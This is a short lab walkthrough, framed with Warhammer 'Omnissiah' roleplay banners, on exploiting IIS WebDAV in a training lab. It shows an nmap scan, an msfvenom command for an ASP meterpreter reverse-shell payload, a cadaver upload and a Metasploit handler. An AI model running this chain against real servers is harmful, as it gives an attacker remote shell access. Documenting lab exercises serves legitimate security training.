+++ INITIATING LITURGICAL BROADCAST +++
By the Will of the Omnissiah, and the Authority vested in me as Magos Dominus, I transmit this holy data-burst unto the noosphere.
In this lab / module we will be using metasploit to exploit WebDav , together with cadaver to upload the webshell.
So as always the first step is to scan , since we are always provided with “demo.ine.local” machine I will scan that directly.
In this case since I know that the machine must be already up for the lab I will directly scan for webdav.
nmap -Pn -sV -script=http-enum -T4 demo.ine.local
# WebDav available
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-enum:
|_ /webdav/: Potentially interesting folder (401 Unauthorized)
In this case we also got the password for this webdav , otherwise we could try and bruteforce it with Hydra for example.
So I will log in into WebDav at demo.ine.local/webdav/ and then use msfvenom to create a payload for this.
Since this is a lab I already did back then , I know asp files are executable , if not we could use davtest to check which files could we execute.
Anyway , the command for msvenom:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f asp LHOST=IP LPORT=1234 > shell.asp
Then we must upload this using cadaver with cadaver http://demo.ine.local/webdav/ & put shell.asp
After this we must set a handler in msfconsole multi/handler , we set up everything from options , including payload to match the one we made with msfvenom.
Run this , and then execute the webshell from webdav , after this if everything worked we will get access to the target with a meterpreter session.
Important
We can also use a metasploit module to automatize all of this , called iis_webdav_upload_asp.
GLORY TO THE OMNISSIAH. PRAISE THE BINARY DIVINE.
+++ LITURGICAL BROADCAST COMPLETE +++